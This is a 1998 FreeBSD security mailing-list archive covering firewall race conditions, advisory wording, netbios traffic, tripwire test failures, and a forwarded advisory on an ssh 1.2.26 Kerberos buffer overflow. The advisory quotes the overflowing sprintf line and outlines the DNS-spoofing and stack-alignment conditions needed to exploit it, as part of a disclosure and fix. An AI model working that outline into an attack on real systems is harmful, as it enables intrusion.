(8.8.8/8.8.8) with ESMTP id HAA25521 for ; Thu, 5 Nov 1998 07:42:16 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id KAA05283 for ; Thu, 5 Nov 1998 10:42:10 -0500 (EST) Date: Thu, 5 Nov 1998 10:42:10 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet Part 2. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So in case anyone missed it in the verbosity of my previous email, I described a race condition involving rc.pccard and dhcp where network programs are executed prior to the installation of firewall rules (possibly leading to applications being exposed to the network where the ipfw rules in rc.firewall should not allow it). I also described a situation where, if your pccard script executed ipfw commands (seems reasonable for a card insert or remove), then you could get unexpected results due to interlacing of rc.firewall and pccard.conf ipfw commands. The program execution problem appears to exist only when the default policy is 'accept'. The pccard.conf ipfw problem exists even when the default policy is 'deny', I believe. I also raised the question: are packets ever queued after acceptance by ipfw such that they could be received later if the port is not yet bound? For example, suppose ipfw in a nascent or under-developed state accepts a packet, and then later named is started -- is it possible through any race conditions that the packet accepted earlier will make it to named later? Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 07:48:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA26315 for freebsd-security-outgoing; Thu, 5 Nov 1998 07:48:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053n18.san.rr.com (dt053n18.san.rr.com [204.210.34.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA26310 for ; Thu, 5 Nov 1998 07:48:02 -0800 (PST) (envelope-from Studded@gorean.org) Received: from gorean.org (localhost [127.0.0.1]) by dt053n18.san.rr.com (8.8.8/8.8.8) with ESMTP id HAA14298; Thu, 5 Nov 1998 07:47:25 -0800 (PST) (envelope-from Studded@gorean.org) Message-ID: <3641C882.EA06705F@gorean.org> Date: Thu, 05 Nov 1998 07:47:14 -0800 From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-STABLE-1101 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nicholas Charles Brawn CC: FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nicholas Charles Brawn wrote: > > Well I just grabbed 1.2.26 and did: > find . -exec grep sprintf {} \; |wc -l This is fairly tangential, but you could accomplish exactly the same thing with just grep: grep -iRc sprintf * hope this is useful to someone, Doug -- *** Chief Operations Officer, DALnet IRC network *** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 10:22:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10126 for freebsd-security-outgoing; Thu, 5 Nov 1998 10:22:17 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA10120 for ; Thu, 5 Nov 1998 10:22:15 -0800 (PST) (envelope-from agifford@infowest.com) Received: from infowest.com (eq.net [207.49.60.250]) by infowest.com (8.8.8/8.8.8) with ESMTP id LAA20326 for ; Thu, 5 Nov 1998 11:22:04 -0700 (MST) Message-ID: <3641ECC1.772D9737@infowest.com> Date: Thu, 05 Nov 1998 11:21:53 -0700 From: "Aaron D. Gifford" X-Mailer: Mozilla 4.07 [en] (X11; I; FreeBSD 2.2.7-STABLE i386) MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment References: <16481.910223203@time.cdrom.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan K. Hubbard wrote: > > > I read the advisory. Often, problems cover other versions as > > well as the one(s) mentioned. And, since I'm paranoid, I > > Security advisories are generally very careful to mention *every* > version covered, an advisory having little value if this piece of > information is not accurate. It also avoids a flood of unnecessary > "is my release affected?!" messages. :-) > > - Jordan > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message However, if you TRULY wanted to avoid an "is my release affected?" posts, an additional line in the advisory saying something like "Versions 2.2.7 and 2.2.7-STABLE as of are not affected." would be handy to see in the advisory as well, since the 2.2.7 line is still viable and popular. I can understand the problem that would be involved if one tried to mention EVERY version NOT affected (which would be ridiculous), but a single line mentioning viable release versions NOT affected would be nice. Aaron out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 11:59:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA22654 for freebsd-security-outgoing; Thu, 5 Nov 1998 11:59:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from commnet.accn.org (commnet.accn.org [207.73.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA22646 for ; Thu, 5 Nov 1998 11:59:19 -0800 (PST) (envelope-from ryanm@accn.org) Received: from accn.org (nt1.accn.org [207.73.64.8]) by commnet.accn.org (8.9.1a/8.9.1) with ESMTP id OAA11388 for ; Thu, 5 Nov 1998 14:58:52 -0500 (EST) Message-ID: <36420344.FAEEF45E@accn.org> Date: Thu, 05 Nov 1998 14:57:56 -0500 From: ryanm X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: "FreeBSD-security@FreeBSD.ORG" Subject: netbios-ns requests Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Freebsd Guru's, In my day to day matters I have noticed several port 137 packets getting nixed by my firewall. In looking at some tcpdump output I have noticed the following packets originating here and destined for places on the Internet and some places on the Internet destined for my internal network. I am curious what would cause this and how this can be disabled?? IS there a security issue out there related to this type of traffic?? I have attached my tcpdump output below. If anyone can pass on any info related to these issues to me I would be appreciative. If possible email me back directly. Thanks very much for your info/help Ryan TCPDUMP OUTPUT FOR 3 PACKETS: 15:50:08.319069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 9475) 15:50:10.059069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 10499) 15:50:11.569069 X.X.X.X.netbios-ns > X.X.X.X.netbios-ns: udp 50 (ttl 32, id 10755) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 12:43:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA28255 for freebsd-security-outgoing; Thu, 5 Nov 1998 12:43:30 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from socrates.i-pi.com (socrates.i-pi.com [198.49.217.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA28246 for ; Thu, 5 Nov 1998 12:43:23 -0800 (PST) (envelope-from ingham@i-pi.com) Received: (from ingham@localhost) by socrates.i-pi.com (8.8.8/8.8.7) id NAA03908; Thu, 5 Nov 1998 13:42:42 -0700 (MST) (envelope-from ingham) Message-ID: <19981105134241.A3887@i-pi.com> Date: Thu, 5 Nov 1998 13:42:41 -0700 From: Kenneth Ingham To: ryanm , "FreeBSD-security@FreeBSD.ORG" Subject: Re: netbios-ns requests References: <36420344.FAEEF45E@accn.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.1i In-Reply-To: <36420344.FAEEF45E@accn.org>; from ryanm on Thu, Nov 05, 1998 at 02:57:56PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 05, 1998 at 02:57:56PM -0500, ryanm wrote: > Hello Freebsd Guru's, > > In my day to day matters I have noticed several port 137 packets getting > nixed by > my firewall. This just got discussed. Take a look in the archives, for example http://www.freebsd.org/cgi/getmsg.cgi?fetch=93002+95200+/usr/local/www/db/text/1998/freebsd-security/19980816.freebsd-security It boils down to if WINS is turned on on a PC that is going to one of your machines, it tries to do a WINS lookup. Kenneth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 14:34:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA11895 for freebsd-security-outgoing; Thu, 5 Nov 1998 14:34:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA11890 for ; Thu, 5 Nov 1998 14:34:37 -0800 (PST) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.8.8/8.8.6) with ESMTP id RAA100430; Thu, 5 Nov 1998 17:34:56 -0500 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Sender: drosih@pop1.rpi.edu Message-Id: In-Reply-To: <3641ECC1.772D9737@infowest.com> References: <16481.910223203@time.cdrom.com> Date: Thu, 5 Nov 1998 17:34:04 -0500 To: "Aaron D. Gifford" , security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:21 AM -0700 11/5/98, Aaron D. Gifford wrote: >Jordan K. Hubbard wrote: >> >> Security advisories are generally very careful to mention *every* >> version covered, an advisory having little value if this piece of >> information is not accurate. It also avoids a flood of unnecessary >> "is my release affected?!" messages. :-) >> >> - Jordan > > > However, if you TRULY wanted to avoid an "is my release affected?" > posts, an additional line in the advisory saying something like > "Versions 2.2.7 and 2.2.7-STABLE as of are not affected." > would be handy to see in the advisory as well, since the 2.2.7 > line is still viable and popular. At which point, 2.2.6 users will immediately say "Hey! You explicitly mentioned that 2.2.7 is not effected, but you didn't say anything about 2.2.6. Does that mean I have to upgrade?" Perhaps the notice could be a bit more clear with a generic "no other versions are effected", but I think it will be even more confusing if the notice explicitly mentions one version which is not effected, but doesn't mention other ones which are also not effected. --- Garance Alistair Drosehn = gad@eclipse.its.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 14:54:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA14123 for freebsd-security-outgoing; Thu, 5 Nov 1998 14:54:32 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net ([24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA14118 for ; Thu, 5 Nov 1998 14:54:31 -0800 (PST) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id OAA19157 for ; Thu, 5 Nov 1998 14:59:35 -0800 (PST) Date: Thu, 5 Nov 1998 14:59:35 -0800 (PST) From: Liam Slusser To: FreeBSD-security@FreeBSD.ORG Subject: ssh 1.2.26 and kerberos code.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Here is some info ya might like.. You can find the patch (and the full report from ssh) on rootshell. http://rootshell.com/archive-j457nxiqi3gp59dv/199811/sshkerb.txt.html liam -------------------------------------------------------------------- This morning SSH Communications Security LTD. released information about a buffer overflow in its ssh 1.2.26 client kerberos code. This came as a surprise after SSH was very bullish about there being no buffer overflows in their code. White it is VERY hard to exploit and only works under certain conditions, it is still a valid security hole. here is the offical statement from ssh. [ http://www.rootshell.com/ ] Date: Thu, 5 Nov 1998 02:38:51 +0200 From: Tatu Ylonen Organization: SSH Communications Security, Finland Subject: security patch for ssh-1.2.26 kerberos code -----BEGIN PGP SIGNED MESSAGE----- This message contains information relevant to people who compile ssh with --with-kerberos5. There is one or more potential security problem in the Kerberos code. These issues are not relevant for people who have not explicitly specified --with-kerberos5 on the configure command line. Peter Benie found a buffer overflow in the kerberos authentication code. To quote from his mail: > What about sshconnect.c, line 1139 > > sprintf(server_name,"host/%s@", remotehost); > > where remotehost is (char *) get_canonical_hostname() (up to 255 chars), > is copied into server_name (a 128 char buffer)? It looks to me like this is a genuine buffer overflow. I had not noticed it when going through the code. This buffer overflow is, however, extremely hard to exploit: 1. The victim must have have client compiled with --with-kerberos5 and --enable-kerberos-tgt-passing. 2. The victim must be connecting to a server running with the same options (i.e., krb5 with tgt passing). 3. You must do the following DNS spoofing: - fake reverse map for the *server* - fake forward map for the fake reversed name 4. You must fake your attack code to look like valid DNS records; this is highly untrivial with modern versions of bind that reject all domain names with invalid characters in them. 5. Only the part of the DNS name beyond 128 bytes can be exploited; that must be made to align with stack frames and must contain appropriate return addresses and jump addresses. It has been shown that this can generally be done, but the space and structural constraints here are extremely tight compared to most instances of buffer overflow exploits. 6. Since the client with Kerberos TGT passing is only used interactively, the user will almost certainly notice that something went wrong. I don't think you can, within the structure and space constraints, construct the code so that the user would not notice at least the client crashing. 7. You cannot try again after a failed attack until the client again tries to log into the same host. This might yield an attack against the *client*. I've fixed this in the source tree. I'd like to thank Peter for reporting this. A fix will be included in the next release (which I expect in about a week). System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 18:38:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA05451 for freebsd-security-outgoing; Thu, 5 Nov 1998 18:38:38 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA05444 for ; Thu, 5 Nov 1998 18:38:34 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id VAA08649; Thu, 5 Nov 1998 21:38:06 -0500 (EST) Date: Thu, 5 Nov 1998 21:38:06 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Liam Slusser cc: FreeBSD-security@FreeBSD.ORG Subject: Re: ssh 1.2.26 and kerberos code.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I do not know if this applies to the KrbIV code shipped with FreeBSD by default; the notes below indicate it does apply to the KrbV code. I believe Dug Song (sp?) is the maintainer of the KrbIV patch for SSH, and I believe that the FreeBSD port does not install the patch. Clearly, this is of interest if you are running KrbV, however. On Thu, 5 Nov 1998, Liam Slusser wrote: > > Here is some info ya might like.. > > You can find the patch (and the full report from ssh) on rootshell. > http://rootshell.com/archive-j457nxiqi3gp59dv/199811/sshkerb.txt.html > > liam > > -------------------------------------------------------------------- > > This morning SSH Communications Security LTD. released information about a > buffer overflow in its ssh 1.2.26 client kerberos code. This came as a > surprise after SSH was very bullish about there being no buffer > overflows in their code. White it is VERY hard to exploit and only works > under certain conditions, it is still a valid security hole. > > here is the offical statement from ssh. > > > > [ http://www.rootshell.com/ ] > > Date: Thu, 5 Nov 1998 02:38:51 +0200 > From: Tatu Ylonen > Organization: SSH Communications Security, Finland > Subject: security patch for ssh-1.2.26 kerberos code > > -----BEGIN PGP SIGNED MESSAGE----- > > This message contains information relevant to people who compile ssh > with --with-kerberos5. There is one or more potential security > problem in the Kerberos code. These issues are not relevant for > people who have not explicitly specified --with-kerberos5 on the > configure command line. > > Peter Benie found a buffer overflow in the > kerberos authentication code. To quote from his mail: > > > What about sshconnect.c, line 1139 > > > > sprintf(server_name,"host/%s@", remotehost); > > > > where remotehost is (char *) get_canonical_hostname() (up to 255 chars), > > is copied into server_name (a 128 char buffer)? > > It looks to me like this is a genuine buffer overflow. I had not > noticed it when going through the code. > > This buffer overflow is, however, extremely hard to exploit: > 1. The victim must have have client compiled with --with-kerberos5 and > --enable-kerberos-tgt-passing. > 2. The victim must be connecting to a server running with the same > options (i.e., krb5 with tgt passing). > 3. You must do the following DNS spoofing: > - fake reverse map for the *server* > - fake forward map for the fake reversed name > 4. You must fake your attack code to look like valid DNS records; this > is highly untrivial with modern versions of bind that reject all > domain names with invalid characters in them. > 5. Only the part of the DNS name beyond 128 bytes can be exploited; that > must be made to align with stack frames and must contain appropriate > return addresses and jump addresses. It has been shown that this can > generally be done, but the space and structural constraints here are > extremely tight compared to most instances of buffer overflow > exploits. > 6. Since the client with Kerberos TGT passing is only used > interactively, the user will almost certainly notice that something > went wrong. I don't think you can, within the structure and space > constraints, construct the code so that the user would not notice at > least the client crashing. > 7. You cannot try again after a failed attack until the client again > tries to log into the same host. > > This might yield an attack against the *client*. > > I've fixed this in the source tree. > > I'd like to thank Peter for reporting this. A fix will be included in > the next release (which I expect in about a week). > > > System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage > www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address > Lowered turbo powered Honda Civic's are really cool. <---------- my quote > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 19:45:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA11359 for freebsd-security-outgoing; Thu, 5 Nov 1998 19:45:00 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA11351 for ; Thu, 5 Nov 1998 19:44:58 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id TAA16584; Thu, 5 Nov 1998 19:44:47 -0800 (PST) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma016577; Thu Nov 5 19:44:38 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id TAA20295; Thu, 5 Nov 1998 19:44:38 -0800 (PST) From: Archie Cobbs Message-Id: <199811060344.TAA20295@bubba.whistle.com> Subject: Re: Amazing wonder packet Part 2. In-Reply-To: from Robert Watson at "Nov 5, 98 10:42:10 am" To: robert+freebsd@cyrus.watson.org Date: Thu, 5 Nov 1998 19:44:38 -0800 (PST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson writes: > I also raised the question: are packets ever queued after acceptance by > ipfw such that they could be received later if the port is not yet bound? > For example, suppose ipfw in a nascent or under-developed state accepts a > packet, and then later named is started -- is it possible through any race > conditions that the packet accepted earlier will make it to named later? Unless you are using divert(4) rules, etc, all ipfw rules apply "atomically" to each packet... there's no possibility of adding/removing rules and applying of rules intersecting (reason: splnet()). Also, ipfw does not hold on to any packets. The only possible exception is a fragmented packet.. you could get one fragment, then change a rule, then get another.. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 19:57:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA12602 for freebsd-security-outgoing; Thu, 5 Nov 1998 19:57:52 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from postbox.acs.ohio-state.edu (postbox.acs.ohio-state.edu [128.146.214.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA12597; Thu, 5 Nov 1998 19:57:50 -0800 (PST) (envelope-from aschool@postbox.acs.ohio-state.edu) Received: from localhost by postbox.acs.ohio-state.edu (8.9.1a/8.9.1) with SMTP id WAA13567; Thu, 5 Nov 1998 22:57:39 -0500 (EST) Date: Thu, 5 Nov 1998 22:57:38 -0500 (EST) From: Albert School X-Sender: aschool@postbox To: security-notifications@FreeBSD.ORG cc: freebsd-security@FreeBSD.ORG Subject: subscribe Message-ID: X-Loop: aschool@postbox.acs.ohio-state.edu MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 22:44:47 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA23991 for freebsd-security-outgoing; Thu, 5 Nov 1998 22:44:47 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pn.wagsky.com (wagsky.vip.best.com [206.86.71.127]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA23978 for ; Thu, 5 Nov 1998 22:44:44 -0800 (PST) (envelope-from root@wagsky.com) Received: from localhost (root@localhost) by pn.wagsky.com (8.8.8/8.8.8) with SMTP id WAA18392 for ; Thu, 5 Nov 1998 22:44:11 -0800 (PST) (envelope-from root@wagsky.com) Date: Thu, 5 Nov 1998 22:44:11 -0800 (PST) From: Jeff Kletsky To: freebsd-security@FreeBSD.ORG Subject: tripwire fails 'make test' Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Under STABLE-2.2.7, after a successful make and make install (under single-user mode) tripwire fails to properly execute its own testing (under either multi- or single-user mode). Is this indicative of a problem which needs to be resolved? Thanks! Jeff root@larry:/usr/ports/security/tripwire/work/tripwire-1.2# make test (cd aux; make CC=cc CFLAGS="-O" LDFLAGS="-static" CPP="cc -E" SHELL=/bin/sh all) (cd src; make CC=cc CFLAGS="-O" LIBS="" LDFLAGS="-static" CPP="cc -E" SHELL=/bin/sh YACC="yacc" LEX="lex" all) (cd tests; make HOSTNAME="hostname" DIST=tripwire-1.2 SHELL=/bin/sh CC=cc) === test.twpre.sh: DESCRIPTION This script excercises the Tripwire preprocessor, testing correctness variable expansion and include files. === test.twpre.sh: BEGIN === === test.twpre.sh: PASS === === test.update.sh: DESCRIPTION This shell script exercises all the Tripwire integrity checking and database update functionalities. === test.update.sh: Setting up auxiliary scripts === === test.update.sh: BEGIN === ../src/tripwire -loosedir -c /tmp/twtest/tw.config -d /tmp/twtest/tw.db -i all === test.update.sh: testing GROWING (safe) files === === test.update.sh: testing GROWING (unsafe) files === === test.update.sh: testing ADDED files === === test.update.sh: testing DELETED files === === test.update.sh: testing CHANGED files === === test.update.sh: test FAILED! (expecting 8, got 0) === === (/tmp/TWLOG contains output from test script and Tripwire) === *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 01:54:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA09737 for freebsd-security-outgoing; Fri, 6 Nov 1998 01:54:42 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heidegger.uol.com.br (smtp.uol.com.br [200.230.198.76]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA09731 for ; Fri, 6 Nov 1998 01:54:23 -0800 (PST) (envelope-from agora@agoractvm.com.br) Received: from agoractvm.com.br (rjo-1-as03-7-a49.gd.uol.com.br [200.224.131.177]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA25370; Wed, 4 Nov 1998 15:59:34 -0200 (EDT) Message-ID: <364094A7.E1CD7017@agoractvm.com.br> Date: Wed, 04 Nov 1998 15:53:43 -0200 From: =?iso-8859-1?Q?Teleinform=E1tica?= Reply-To: agora@uol.com.br Organization: =?iso-8859-1?Q?=C1GORA?= C.T.V.M. S/A X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Mark Murray CC: "Jordan K. Hubbard" , agora@uol.com.br, FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] References: <5769.910193185@time.cdrom.com> <199811041749.TAA00172@gratis.grondar.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- I Agree, but it was not my purpose, I posted this msg only for information... :-) Mark Murray wrote: > "Jordan K. Hubbard" wrote: > > Bah. *More* rumors without proof. "I will not post this exploit.." > > My sentiments exactly. > > M > -- > Mark Murray > Join the anti-SPAM movement: http://www.cauce.org -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.5.3i for non-commercial use iQCVAwUBNkCUkSntOG9aOFmrAQFeYgQAqag2GYkUHoO+o4ABhCcieckeWA2yP0Ae zNaKS7I81fIkhoHzM9+rKvpDSVWs5FUJhBcu4/JsjDNpwF5CyGdoADe6w3K5m91U xhetQNW9dVseDomQtBaKilPbLyZA2ykQSwGNXQgUGEaz+tZuzb0txe0sEfvkmiBs 2usP26LyXSI= =oyEd -----END PGP SIGNATURE----- -- Regards, _______________________ | Nelson 'Stderr' Brito |_________________________________ |_________________________________________________________| |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | | E-mail: | nelson@cyberspace.org | | URL: | http://www.angelfire.com/sd/stderr | | Public key: | See the URL | |______________|__________________________________________| |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 04:07:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA21360 for freebsd-security-outgoing; Fri, 6 Nov 1998 04:07:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA21355 for ; Fri, 6 Nov 1998 04:06:59 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA01364; Fri, 6 Nov 1998 09:06:25 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199811061206.JAA01364@ns1.sminter.com.ar> Subject: Re: tripwire fails 'make test' In-Reply-To: from Jeff Kletsky at "Nov 5, 98 10:44:11 pm" To: root@wagsky.com (Jeff Kletsky) Date: Fri, 6 Nov 1998 09:06:25 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The same happened to me, even on a Sun. Regards. En un mensaje anterior, Jeff Kletsky escribió: > Under STABLE-2.2.7, after a successful make and make install > (under single-user mode) tripwire fails to properly execute its own > testing (under either multi- or single-user mode). Is this indicative of > a problem which needs to be resolved? [...] Fernando P. Schapachnik Administracion de la red S&M International SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 05:18:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA28530 for freebsd-security-outgoing; Fri, 6 Nov 1998 05:18:03 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) 